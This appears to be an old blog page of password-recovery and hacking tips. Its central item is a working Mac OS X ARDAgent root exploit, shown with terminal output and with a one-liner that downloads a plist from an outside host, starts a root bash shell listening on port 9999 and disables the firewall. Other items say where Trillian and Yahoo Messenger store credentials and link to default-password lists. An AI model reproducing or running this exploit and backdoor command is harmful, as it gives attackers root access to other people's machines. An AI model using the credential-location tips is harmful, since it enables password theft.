This works in Internet Explorer, Firefox, Netscape and Opera browsers
Go to a page that has a password hidden by ***’s then just paste this simple script below into your browser bar and it will pop up a messagebox showing your password.

This script replaces the ****’s with the plaintext password , works in Firefox only

Also quick access to Firefox’s password manager instead of going through the menus
Paste this in your browser: chrome://passwordmgr/content/passwordManager.xul

Using BackTrack Live CD which can be found ::here::

For those of you who forgot your spiffy new Vista Logon password. Here’s a quick and dirty way to make a new user account. BTW, this has been around since XP but still useful.

(more…)

Half the Mac OS X boxes in the world (confirmed on Mac OS X 10.4 Tiger and 10.5 Leopard) can be rooted through
AppleScript:
osascript -e ‘tell app “ARDAgent” to do shell script “whoami”‘;

I don’t have (and never have had) Screen Sharing enabled on Leopard 10.5.3, and this exploit works perfectly.
dan@Geelong:~$ ls -lh /etc/somefile
ls: /etc/somefile: No such file or directory
dan@Geelong:~$ osascript -e ‘tell app “ARDAgent” to do shell script “touch /etc/somefile”‘
dan@Geelong:~$ ls -lh /etc/somefile
-rw-rw-rw- 1 root wheel 0B Jun 18 14:16 /etc/somefile
dan@Geelong:~$ osascript -e ‘tell app “ARDAgent” to do shell script “rm /etc/somefile”‘
dan@Geelong:~$ ls -lh /etc/somefile
ls: /etc/somefile: No such file or directory
So, how dangerous is this? Here’s an example:

osascript -e ‘tell app “ARDAgent” to do shell script “cd /System/Library/LaunchDaemons ; curl -o bash.plist http://cdslash.net/temp/bash.plist [cdslash.net] ; chmod 600 bash.plist ; launchctl load bash.plist ; launchctl start com.apple.bash ; ipfw disable firewall; launchctl “‘

This will download, install, load, and start a plist that provides an interactive bash shell on port 9999, and disables the ipfw firewall (Which is not enabled by default). If you run the above, you can ‘nc localhost 9999’ and find yourself at a root shell.

To remove, run ‘launchctl unload com.apple.bash’ ‘launchctl unload /System/Library/LaunchDaemons/bash.plist’ and then ‘rm /System/Library/LaunchDaemons/bash.plist’

It should be noted that this service is accessible even if the application firewall is enabled. The only thing protecting the user at this point is their router firewall, if they have one, and that’s easily bypassed with a Python script.

So yeah; anything can be downloaded, and anything can be done with it. Scary.

Having trouble remembering the default password to the router you setup and never changed any settings to because “it worked so i left it alone”? Well here’s a continuously updated list of default passwords.

http://www.phenoelit-us.org/dpl/dpl.html

nice writeup on the common passwords and peoples thought process on picking passwords

http://blog.jimmyr.com/Most_Common_Passwords_20_2008.php

because this is continually updating
find the newest info here

TrillianView demo version is now available for download . This version will recover all your Trillian Messenger screen names and only the first 3 letters of your password. If you would like to purchase the full version for $4.99 USD , which shows the complete password, you can do so by choosing paypal or e-gold for payments in the links below.




[smartcounter:5]

The trillian passwords are stored separately in .ini files (i.e. msn.ini,yahoo.ini aim.ini etc). These are stored in your trillian directory (usually c:\program files\trillian\) in the “users” folder.

Within the users folder, the ini files will either be in a folder called “default” or a folder named after your username.

c:\program files\trillian\users\default\msn.ini (more…)

The old Yahoo Messenger, i think prior to 7.0 ,used to keep the encrypted password in the registry HKEY_CURRENT_USER\Software\Yahoo\Pager under a key called
“EOptions String” this can be decrypted by using Yahoo’s own dll located in the Yahoo Install directory “ycrwin32.dll” (more…)

Don’t know the root-level password for MySQL? Or just plain forgot it? (more…)